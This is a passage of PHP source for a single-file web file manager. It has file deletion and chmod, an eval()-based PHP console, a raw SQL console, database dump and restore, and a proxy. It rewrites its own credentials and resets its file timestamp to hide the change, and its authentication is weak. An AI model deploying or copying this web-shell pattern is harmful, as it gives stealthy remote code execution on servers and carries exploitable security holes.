		$search = preg_match('#translation[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#', $fgc, $matches);
		if (!empty($matches[1])) {
			$filemtime = filemtime(__FILE__);
			$replace = str_replace('{"'.$matches[1].'"}',$translation_string,$fgc);
			if (file_put_contents(__FILE__, $replace)) {
				$msg .= __('File updated');
			}	else $msg .= __('Error occurred');
			if (!empty($fm_config['fm_restore_time'])) touch(__FILE__,$filemtime);
		}	
		$lang = json_decode($translation_string,true);
	}
}

/* Functions */

//translation
function __($text){
	global $lang;
	if (isset($lang[$text])) return $lang[$text];
	else return $text;
};

//delete files and dirs recursively
function fm_del_files($file, $recursive = false) {
	if($recursive && @is_dir($file)) {
		$els = fm_scan_dir($file, '', '', true);
		foreach ($els as $el) {
			if($el != '.' && $el != '..'){
				fm_del_files($file . '/' . $el, true);
			}
		}
	}
	if(@is_dir($file)) {
		return rmdir($file);
	} else {
		return @unlink($file);
	}
}

//file perms
function fm_rights_string($file, $if = false){
	$perms = fileperms($file);
	$info = '';
	if(!$if){
		if (($perms & 0xC000) == 0xC000) {
			//Socket
			$info = 's';
		} elseif (($perms & 0xA000) == 0xA000) {
			//Symbolic Link
			$info = 'l';
		} elseif (($perms & 0x8000) == 0x8000) {
			//Regular
			$info = '-';
		} elseif (($perms & 0x6000) == 0x6000) {
			//Block special
			$info = 'b';
		} elseif (($perms & 0x4000) == 0x4000) {
			//Directory
			$info = 'd';
		} elseif (($perms & 0x2000) == 0x2000) {
			//Character special
			$info = 'c';
		} elseif (($perms & 0x1000) == 0x1000) {
			//FIFO pipe
			$info = 'p';
		} else {
			//Unknown
			$info = 'u';
		}
	}
  
	//Owner
	$info .= (($perms & 0x0100) ? 'r' : '-');
	$info .= (($perms & 0x0080) ? 'w' : '-');
	$info .= (($perms & 0x0040) ?
	(($perms & 0x0800) ? 's' : 'x' ) :
	(($perms & 0x0800) ? 'S' : '-'));
 
	//Group
	$info .= (($perms & 0x0020) ? 'r' : '-');
	$info .= (($perms & 0x0010) ? 'w' : '-');
	$info .= (($perms & 0x0008) ?
	(($perms & 0x0400) ? 's' : 'x' ) :
	(($perms & 0x0400) ? 'S' : '-'));
 
	//World
	$info .= (($perms & 0x0004) ? 'r' : '-');
	$info .= (($perms & 0x0002) ? 'w' : '-');
	$info .= (($perms & 0x0001) ?
	(($perms & 0x0200) ? 't' : 'x' ) :
	(($perms & 0x0200) ? 'T' : '-'));

	return $info;
}

function fm_convert_rights($mode) {
	$mode = str_pad($mode,9,'-');
	$trans = array('-'=>'0','r'=>'4','w'=>'2','x'=>'1');
	$mode = strtr($mode,$trans);
	$newmode = '0';
	$owner = (int) $mode[0] + (int) $mode[1] + (int) $mode[2]; 
	$group = (int) $mode[3] + (int) $mode[4] + (int) $mode[5]; 
	$world = (int) $mode[6] + (int) $mode[7] + (int) $mode[8]; 
	$newmode .= $owner . $group . $world;
	return intval($newmode, 8);
}

function fm_chmod($file, $val, $rec = false) {
	$res = @chmod(realpath($file), $val);
	if(@is_dir($file) && $rec){
		$els = fm_scan_dir($file);
		foreach ($els as $el) {
			$res = $res && fm_chmod($file . '/' . $el, $val, true);
		}
	}
	return $res;
}

//load files
function fm_download($file_name) {
    if (!empty($file_name)) {
		if (file_exists($file_name)) {
			header("Content-Disposition: attachment; filename=" . basename($file_name));   
			header("Content-Type: application/force-download");
			header("Content-Type: application/octet-stream");
			header("Content-Type: application/download");
			header("Content-Description: File Transfer");            
			header("Content-Length: " . filesize($file_name));		
			flush(); // this doesn't really matter.
			$fp = fopen($file_name, "r");
			while (!feof($fp)) {
				echo fread($fp, 65536);
				flush(); // this is essential for large downloads
			} 
			fclose($fp);
			die();
		} else {
			header('HTTP/1.0 404 Not Found', true, 404);
			header('Status: 404 Not Found'); 
			die();
        }
    } 
}

//show folder size
function fm_dir_size($f,$format=true) {
	if($format)  {
		$size=fm_dir_size($f,false);
		if($size<=1024) return $size.' bytes';
		elseif($size<=1024*1024) return round($size/(1024),2).'&nbsp;Kb';
		elseif($size<=1024*1024*1024) return round($size/(1024*1024),2).'&nbsp;Mb';
		elseif($size<=1024*1024*1024*1024) return round($size/(1024*1024*1024),2).'&nbsp;Gb';
		elseif($size<=1024*1024*1024*1024*1024) return round($size/(1024*1024*1024*1024),2).'&nbsp;Tb'; //:)))
		else return round($size/(1024*1024*1024*1024*1024),2).'&nbsp;Pb'; // ;-)
	} else {
		if(is_file($f)) return filesize($f);
		$size=0;
		$dh=opendir($f);
		while(($file=readdir($dh))!==false) {
			if($file=='.' || $file=='..') continue;
			if(is_file($f.'/'.$file)) $size+=filesize($f.'/'.$file);
			else $size+=fm_dir_size($f.'/'.$file,false);
		}
		closedir($dh);
		return $size+filesize($f); 
	}
}

//scan directory
function fm_scan_dir($directory, $exp = '', $type = 'all', $do_not_filter = false) {
	$dir = $ndir = array();
	if(!empty($exp)){
		$exp = '/^' . str_replace('*', '(.*)', str_replace('.', '\\.', $exp)) . '$/';
	}
	if(!empty($type) && $type !== 'all'){
		$func = 'is_' . $type;
	}
	if(@is_dir($directory)){
		$fh = opendir($directory);
		while (false !== ($filename = readdir($fh))) {
			if(substr($filename, 0, 1) != '.' || $do_not_filter) {
				if((empty($type) || $type == 'all' || $func($directory . '/' . $filename)) && (empty($exp) || preg_match($exp, $filename))){
					$dir[] = $filename;
				}
			}
		}
		closedir($fh);
		natsort($dir);
	}
	return $dir;
}

function fm_link($get,$link,$name,$title='') {
	if (empty($title)) $title=$name.' '.basename($link);
	return '&nbsp;&nbsp;<a href="?'.$get.'='.base64_encode($link).'" title="'.$title.'">'.$name.'</a>';
}

function fm_arr_to_option($arr,$n,$sel=''){
	foreach($arr as $v){
		$b=$v[$n];
		$res.='<option value="'.$b.'" '.($sel && $sel==$b?'selected':'').'>'.$b.'</option>';
	}
	return $res;
}

function fm_lang_form ($current='en'){
return '
<form name="change_lang" method="post" action="">
	<select name="fm_lang" title="'.__('Language').'" onchange="document.forms[\'change_lang\'].submit()" >
		<option value="en" '.($current=='en'?'selected="selected" ':'').'>'.__('English').'</option>
		<option value="de" '.($current=='de'?'selected="selected" ':'').'>'.__('German').'</option>
		<option value="ru" '.($current=='ru'?'selected="selected" ':'').'>'.__('Russian').'</option>
		<option value="fr" '.($current=='fr'?'selected="selected" ':'').'>'.__('French').'</option>
		<option value="uk" '.($current=='uk'?'selected="selected" ':'').'>'.__('Ukrainian').'</option>
	</select>
</form>
';
}
	
function fm_root($dirname){
	return ($dirname=='.' OR $dirname=='..');
}

function fm_php($string){
	$display_errors=ini_get('display_errors');
	ini_set('display_errors', '1');
	ob_start();
	eval(trim($string));
	$text = ob_get_contents();
	ob_end_clean();
	ini_set('display_errors', $display_errors);
	return $text;
}

//SHOW DATABASES
function fm_sql_connect(){
	global $fm_config;
	return new mysqli($fm_config['sql_server'], $fm_config['sql_username'], $fm_config['sql_password'], $fm_config['sql_db']);
}

function fm_sql($query){
	global $fm_config;
	$query=trim($query);
	ob_start();
	$connection = fm_sql_connect();
	if ($connection->connect_error) {
		ob_end_clean();	
		return $connection->connect_error;
	}
	$connection->set_charset('utf8');
    $queried = mysqli_query($connection,$query);
	if ($queried===false) {
		ob_end_clean();	
		return mysqli_error($connection);
    } else {
		if(!empty($queried)){
			while($row = mysqli_fetch_assoc($queried)) {
				$query_result[]=  $row;
			}
		}
		$vdump=empty($query_result)?'':var_export($query_result,true);	
		ob_end_clean();	
		$connection->close();
		return '<pre>'.stripslashes($vdump).'</pre>';
	}
}

function fm_backup_tables($tables = '*', $full_backup = true) {
	global $path;
	$mysqldb = fm_sql_connect();
	$delimiter = "; \n  \n";
	if($tables == '*')	{
		$tables = array();
		$result = $mysqldb->query('SHOW TABLES');
		while($row = mysqli_fetch_row($result))	{
			$tables[] = $row[0];
		}
	} else {
		$tables = is_array($tables) ? $tables : explode(',',$tables);
	}
    
	$return='';
	foreach($tables as $table)	{
		$result = $mysqldb->query('SELECT * FROM '.$table);
		$num_fields = mysqli_num_fields($result);
		$return.= 'DROP TABLE IF EXISTS `'.$table.'`'.$delimiter;
		$row2 = mysqli_fetch_row($mysqldb->query('SHOW CREATE TABLE '.$table));
		$return.=$row2[1].$delimiter;
        if ($full_backup) {
		for ($i = 0; $i < $num_fields; $i++)  {
			while($row = mysqli_fetch_row($result)) {
				$return.= 'INSERT INTO `'.$table.'` VALUES(';
				for($j=0; $j<$num_fields; $j++)	{
					$row[$j] = addslashes($row[$j]);
					$row[$j] = str_replace("\n","\\n",$row[$j]);
					if (isset($row[$j])) { $return.= '"'.$row[$j].'"' ; } else { $return.= '""'; }
					if ($j<($num_fields-1)) { $return.= ','; }
				}
				$return.= ')'.$delimiter;
			}
		  }
		} else { 
		$return = preg_replace("#AUTO_INCREMENT=[\d]+ #is", '', $return);
		}
		$return.="\n\n\n";
	}

	//save file
    $file=gmdate("Y-m-d_H-i-s",time()).'.sql';
	$handle = fopen($file,'w+');
	fwrite($handle,$return);
	fclose($handle);
	$alert = 'onClick="if(confirm(\''. __('File selected').': \n'. $file. '. \n'.__('Are you sure you want to delete this file?') . '\')) document.location.href = \'?delete=' . $file . '&path=' . $path  . '\'"';
    return $file.': '.fm_link('download',$path.$file,__('Download'),__('Download').' '.$file).' <a href="#" title="' . __('Delete') . ' '. $file . '" ' . $alert . '>' . __('Delete') . '</a>';
}

function fm_restore_tables($sqlFileToExecute) {
	$mysqldb = fm_sql_connect();
	$delimiter = "; \n  \n";
    // Load and explode the sql file
    $f = fopen($sqlFileToExecute,"r+");
    $sqlFile = fread($f,filesize($sqlFileToExecute));
    $sqlArray = explode($delimiter,$sqlFile);
	
    //Process the sql file by statements
    foreach ($sqlArray as $stmt) {
        if (strlen($stmt)>3){
			$result = $mysqldb->query($stmt);
				if (!$result){
					$sqlErrorCode = mysqli_errno($mysqldb->connection);
					$sqlErrorText = mysqli_error($mysqldb->connection);
					$sqlStmt      = $stmt;
					break;
           	     }
           	  }
           }
if (empty($sqlErrorCode)) return __('Success').' — '.$sqlFileToExecute;
else return $sqlErrorText.'<br/>'.$stmt;
}

function fm_img_link($filename){
	return './'.basename(__FILE__).'?img='.base64_encode($filename);
}

function fm_home_style(){
	return '
input, input.fm_input {
	text-indent: 2px;
}

input, textarea, select, input.fm_input {
	color: black;
	font: normal 8pt Verdana, Arial, Helvetica, sans-serif;
	border-color: black;
	background-color: #FCFCFC none !important;
	border-radius: 0;
	padding: 2px;
}

input.fm_input {
	background: #FCFCFC none !important;
	cursor: pointer;
}

.home {
	background-image: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAMAAAAoLQ9TAAAABGdBTUEAAK/INwWK6QAAAgRQTFRF/f396Ojo////tT02zr+fw66Rtj432TEp3MXE2DAr3TYp1y4mtDw2/7BM/7BOqVpc/8l31jcqq6enwcHB2Tgi5jgqVpbFvra2nBAV/Pz82S0jnx0W3TUkqSgi4eHh4Tsre4wosz026uPjzGYd6Us3ynAydUBA5Kl3fm5eqZaW7ODgi2Vg+Pj4uY+EwLm5bY9U//7jfLtC+tOK3jcm/71u2jYo1UYh5aJl/seC3jEm12kmJrIA1jMm/9aU4Lh0e01BlIaE///dhMdC7IA//fTZ2c3MW6nN30wf95Vd4JdXoXVos8nE4efN/+63IJgSnYhl7F4csXt89GQUwL+/jl1c41Aq+fb2gmtI1rKa2C4kJaIA3jYrlTw5tj423jYn3cXE1zQoxMHBp1lZ3Dgmqiks/+mcjLK83jYkymMV3TYk//HM+u7Whmtr0odTpaOjfWJfrHpg/8Bs/7tW/7Ve+4U52DMm3MLBn4qLgNVM6MzB3lEflIuL/+jA///20LOzjXx8/7lbWpJG2C8k3TosJKMA1ywjopOR1zYp5Dspiay+yKNhqKSk8NW6/fjns7Oz2tnZuz887b+W3aRY/+ms4rCE3Tot7V85bKxjuEA3w45Vh5uhq6am4cFxgZZW/9qIuwgKy0sW+ujT4TQntz423C8i3zUj/+Kw/a5d6UMxuL6wzDEr////cqJQfAAAAKx0Uk5T////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////AAWVFbEAAAAZdEVYdFNvZnR3YXJlAEFkb2JlIEltYWdlUmVhZHlxyWU8AAAA2UlEQVQoU2NYjQYYsAiE8U9YzDYjVpGZRxMiECitMrVZvoMrTlQ2ESRQJ2FVwinYbmqTULoohnE1g1aKGS/fNMtk40yZ9KVLQhgYkuY7NxQvXyHVFNnKzR69qpxBPMez0ETAQyTUvSogaIFaPcNqV/M5dha2Rl2Timb6Z+QBDY1XN/Sbu8xFLG3eLDfl2UABjilO1o012Z3ek1lZVIWAAmUTK6L0s3pX+jj6puZ2AwWUvBRaphswMdUujCiwDwa5VEdPI7ynUlc7v1qYURLquf42hz45CBPDtwACrm+RDcxJYAAAAABJRU5ErkJggg==");
	background-repeat: no-repeat;
}';
}

function fm_config_checkbox_row($name,$value) {
	global $fm_config;
	return '<tr><td class="row1"><input id="fm_config_'.$value.'" name="fm_config['.$value.']" value="1" '.(empty($fm_config[$value])?'':'checked="true"').' type="checkbox"></td><td class="row2 whole"><label for="fm_config_'.$value.'">'.$name.'</td></tr>';
}

function fm_protocol() {
	if (isset($_SERVER['HTTP_SCHEME'])) return $_SERVER['HTTP_SCHEME'].'://';
	if (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') return 'https://';
	if (isset($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == 443) return 'https://';
	if (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') return 'https://';
	return 'http://';
}

function fm_site_url() {
	return fm_protocol().$_SERVER['HTTP_HOST'];
}

function fm_url($full=false) {
	$host=$full?fm_site_url():'.';
	return $host.'/'.basename(__FILE__);
}

function fm_home($full=false){
	return '&nbsp;<a href="'.fm_url($full).'" title="'.__('Home').'"><span class="home">&nbsp;&nbsp;&nbsp;&nbsp;</span></a>';
}

function fm_run_input($lng) {
	global $fm_config;
	$return = !empty($fm_config['enable_'.$lng.'_console']) ? 
	'
				<form  method="post" action="'.fm_url().'" style="display:inline">
				<input type="submit" name="'.$lng.'run" value="'.strtoupper($lng).' '.__('Console').'">
				</form>
' : '';
	return $return;
}

function fm_url_proxy($matches) {
	$link = str_replace('&amp;','&',$matches[2]);
	$url = isset($_GET['url'])?$_GET['url']:'';
	$parse_url = parse_url($url);
	$host = $parse_url['scheme'].'://'.$parse_url['host'].'/';
	if (substr($link,0,2)=='//') {
		$link = substr_replace($link,fm_protocol(),0,2);
	} elseif (substr($link,0,1)=='/') {
		$link = substr_replace($link,$host,0,1);	
	} elseif (substr($link,0,2)=='./') {
		$link = substr_replace($link,$host,0,2);	
	} elseif (substr($link,0,4)=='http') {
		//alles machen wunderschon
	} else {
		$link = $host.$link;
	} 
	if ($matches[1]=='href' && !strripos($link, 'css')) {
		$base = fm_site_url().'/'.basename(__FILE__);
		$baseq = $base.'?proxy=true&url=';
		$link = $baseq.urlencode($link);
	} elseif (strripos($link, 'css')){
		//как-то тоже подменять надо
	}
	return $matches[1].'="'.$link.'"';
}
 
function fm_tpl_form($lng_tpl) {
	global ${$lng_tpl.'_templates'};
	$tpl_arr = json_decode(${$lng_tpl.'_templates'},true);
	$str = '';
	foreach ($tpl_arr as $ktpl=>$vtpl) {
		$str .= '<tr><td class="row1"><input name="'.$lng_tpl.'_name[]" value="'.$ktpl.'"></td><td class="row2 whole"><textarea name="'.$lng_tpl.'_value[]"  cols="55" rows="5" class="textarea_input">'.$vtpl.'</textarea> <input name="del_'.rand().'" type="button" onClick="this.parentNode.parentNode.remove();" value="'.__('Delete').'"/></td></tr>';
	}
return '
<table>
<tr><th colspan="2">'.strtoupper($lng_tpl).' '.__('templates').' '.fm_run_input($lng_tpl).'</th></tr>
<form method="post" action="">
<input type="hidden" value="'.$lng_tpl.'" name="tpl_edited">
<tr><td class="row1">'.__('Name').'</td><td class="row2 whole">'.__('Value').'</td></tr>
'.$str.'
<tr><td colspan="2" class="row3"><input name="res" type="button" onClick="document.location.href = \''.fm_url().'?fm_settings=true\';" value="'.__('Reset').'"/> <input type="submit" value="'.__('Save').'" ></td></tr>
</form>
<form method="post" action="">
<input type="hidden" value="'.$lng_tpl.'" name="tpl_edited">
<tr><td class="row1"><input name="'.$lng_tpl.'_new_name" value="" placeholder="'.__('New').' '.__('Name').'"></td><td class="row2 whole"><textarea name="'.$lng_tpl.'_new_value"  cols="55" rows="5" class="textarea_input" placeholder="'.__('New').' '.__('Value').'"></textarea></td></tr>
<tr><td colspan="2" class="row3"><input type="submit" value="'.__('Add').'" ></td></tr>
</form>
</table>
';
}

/* End Functions */

// authorization
if ($auth['authorize']) {
	if (isset($_POST['login']) && isset($_POST['password'])){
		if (($_POST['login']==$auth['login']) && ($_POST['password']==$auth['password'])) {
			setcookie($auth['cookie_name'], $auth['login'].'|'.md5($auth['password']), time() + (86400 * $auth['days_authorization']));
			$_COOKIE[$auth['cookie_name']]=$auth['login'].'|'.md5($auth['password']);
		}
	}
	if (!isset($_COOKIE[$auth['cookie_name']]) OR ($_COOKIE[$auth['cookie_name']]!=$auth['login'].'|'.md5($auth['password']))) {
		echo '
<!doctype html>
<html>
<head>
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1" />
<title>'.__('File manager').'</title>
</head>
<body>
<form action="" method="post">
'.__('Login').' <input name="login" type="text">&nbsp;&nbsp;&nbsp;
'.__('Password').' <input name="password" type="password">&nbsp;&nbsp;&nbsp;
<input type="submit" value="'.__('Enter').'" class="fm_input">
</form>
'.fm_lang_form($language).'
</body>
</html>
';  
die();
	}
	if (isset($_POST['quit'])) {
		unset($_COOKIE[$auth['cookie_name']]);
		setcookie($auth['cookie_name'], '', time() - (86400 * $auth['days_authorization']));
		header('Location: '.fm_site_url().$_SERVER['REQUEST_URI']);
	}
}

// Change config
if (isset($_GET['fm_settings'])) {
	if (isset($_GET['fm_config_delete'])) { 
		unset($_COOKIE['fm_config']);
		setcookie('fm_config', '', time() - (86400 * $auth['days_authorization']));
		header('Location: '.fm_url().'?fm_settings=true');
		exit(0);
	}	elseif (isset($_POST['fm_config'])) { 
		$fm_config = $_POST['fm_config'];
		setcookie('fm_config', serialize($fm_config), time() + (86400 * $auth['days_authorization']));
		$_COOKIE['fm_config'] = serialize($fm_config);
		$msg = __('Settings').' '.__('done');
	}	elseif (isset($_POST['fm_login'])) { 
		if (empty($_POST['fm_login']['authorize'])) $_POST['fm_login'] = array('authorize' => '0') + $_POST['fm_login'];
		$fm_login = json_encode($_POST['fm_login']);
		$fgc = file_get_contents(__FILE__);
		$search = preg_match('#authorization[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#', $fgc, $matches);
		if (!empty($matches[1])) {
			$filemtime = filemtime(__FILE__);
			$replace = str_replace('{"'.$matches[1].'"}',$fm_login,$fgc);
			if (file_put_contents(__FILE__, $replace)) {
				$msg .= __('File updated');
				if ($_POST['fm_login']['login'] != $auth['login']) $msg .= ' '.__('Login').': '.$_POST['fm_login']['login'];
				if ($_POST['fm_login']['password'] != $auth['password']) $msg .= ' '.__('Password').': '.$_POST['fm_login']['password'];
				$auth = $_POST['fm_login'];
			}
			else $msg .= __('Error occurred');
			if (!empty($fm_config['fm_restore_time'])) touch(__FILE__,$filemtime);
		}
	} elseif (isset($_POST['tpl_edited'])) { 
		$lng_tpl = $_POST['tpl_edited'];
		if (!empty($_POST[$lng_tpl.'_name'])) {
			$fm_php = json_encode(array_combine($_POST[$lng_tpl.'_name'],$_POST[$lng_tpl.'_value']),JSON_HEX_APOS);
		} elseif (!empty($_POST[$lng_tpl.'_new_name'])) {
			$fm_php = json_encode(json_decode(${$lng_tpl.'_templates'},true)+array($_POST[$lng_tpl.'_new_name']=>$_POST[$lng_tpl.'_new_value']),JSON_HEX_APOS);
		}
		if (!empty($fm_php)) {
			$fgc = file_get_contents(__FILE__);
			$search = preg_match('#'.$lng_tpl.'_templates[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#', $fgc, $matches);
			if (!empty($matches[1])) {
				$filemtime = filemtime(__FILE__);
				$replace = str_replace('{"'.$matches[1].'"}',$fm_php,$fgc);
				if (file_put_contents(__FILE__, $replace)) {
					${$lng_tpl.'_templates'} = $fm_php;
					$msg .= __('File updated');
				} else $msg .= __('Error occurred');
				if (!empty($fm_config['fm_restore_time'])) touch(__FILE__,$filemtime);
			}	
		} else $msg .= __('Error occurred');
	}
}

// Just show image
if (isset($_GET['img'])) {
	$file=base64_decode($_GET['img']);
	if ($info=getimagesize($file)){
		switch  ($info[2]){	//1=GIF, 2=JPG, 3=PNG, 4=SWF, 5=PSD, 6=BMP
			case 1: $ext='gif'; break;
			case 2: $ext='jpeg'; break;
			case 3: $ext='png'; break;
			case 6: $ext='bmp'; break;
			default: die();
		}
		header("Content-type: image/$ext");
		echo file_get_contents($file);
		die();
	}
}

// Just download file
if (isset($_GET['download'])) {
	$file=base64_decode($_GET['download']);
	fm_download($file);	
}

// Just show info
if (isset($_GET['phpinfo'])) {
	phpinfo(); 
	die();
}

// Mini proxy, many bugs!
if (isset($_GET['proxy']) && (!empty($fm_config['enable_proxy']))) {
	$url = isset($_GET['url'])?urldecode($_GET['url']):'';
	$proxy_form = '
<div style="position:relative;z-index:100500;background: linear-gradient(to bottom, #e4f5fc 0%,#bfe8f9 50%,#9fd8ef 51%,#2ab0ed 100%);">
	<form action="" method="GET">
	<input type="hidden" name="proxy" value="true">
	'.fm_home().' <a href="'.$url.'" target="_blank">Url</a>: <input type="text" name="url" value="'.$url.'" size="55">
	<input type="submit" value="'.__('Show').'" class="fm_input">
	</form>
</div>
';
	if ($url) {
		$ch = curl_init($url);
		curl_setopt($ch, CURLOPT_USERAGENT, 'Den1xxx test proxy');
		curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
		curl_setopt($ch, CURLOPT_SSL_VERIFYHOST,0);
		curl_setopt($ch, CURLOPT_SSL_VERIFYPEER,0);
		curl_setopt($ch, CURLOPT_HEADER, 0);
		curl_setopt($ch, CURLOPT_REFERER, $url);
		curl_setopt($ch, CURLOPT_RETURNTRANSFER,true);
		$result = curl_exec($ch);
		curl_close($ch);
		//$result = preg_replace('#(src)=["\'][http://]?([^:]*)["\']#Ui', '\\1="'.$url.'/\\2"', $result);
		$result = preg_replace_callback('#(href|src)=["\'][http://]?([^:]*)["\']#Ui', 'fm_url_proxy', $result);
		$result = preg_replace('%(<body.*?>)%i', '$1'.'<style>'.fm_home_style().'</style>'.$proxy_form, $result);
		echo $result;
		die();
	} 
}
?>
<!doctype html>
<html>
<head>     
	<meta charset="utf-8" />
	<meta name="viewport" content="width=device-width, initial-scale=1" />
    <title><?=__('File manager')?></title>
<style>
body {
	background-color:	white;
	font-family:		Verdana, Arial, Helvetica, sans-serif;
	font-size:			8pt;
	margin:				0px;
}

a:link, a:active, a:visited { color: #006699; text-decoration: none; }
a:hover { color: #DD6900; text-decoration: underline; }
a.th:link { color: #FFA34F; text-decoration: none; }
a.th:active { color: #FFA34F; text-decoration: none; }
a.th:visited { color: #FFA34F; text-decoration: none; }
a.th:hover {  color: #FFA34F; text-decoration: underline; }

table.bg {
	background-color: #ACBBC6
}

th, td { 
	font:	normal 8pt Verdana, Arial, Helvetica, sans-serif;
	padding: 3px;
}

th	{
	height:				25px;
	background-color:	#006699;
	color:				#FFA34F;
	font-weight:		bold;
	font-size:			11px;
}

.row1 {
	background-color:	#EFEFEF;
}

.row2 {
	background-color:	#DEE3E7;
}

.row3 {
	background-color:	#D1D7DC;
	padding: 5px;
}

tr.row1:hover {
	background-color:	#F3FCFC;
}

tr.row2:hover {
	background-color:	#F0F6F6;
}

.whole {
	width: 100%;
}

.all tbody td:first-child{width:100%;}

textarea {
	font: 9pt 'Courier New', courier;
	line-height: 125%;
	padding: 5px;
}

.textarea_input {
	height: 1em;
}

.textarea_input:focus {
	height: auto;
}

input[type=submit]{
	background: #FCFCFC none !important;
	cursor: pointer;
}

.folder {
    background-image: url("data:image/png;base64,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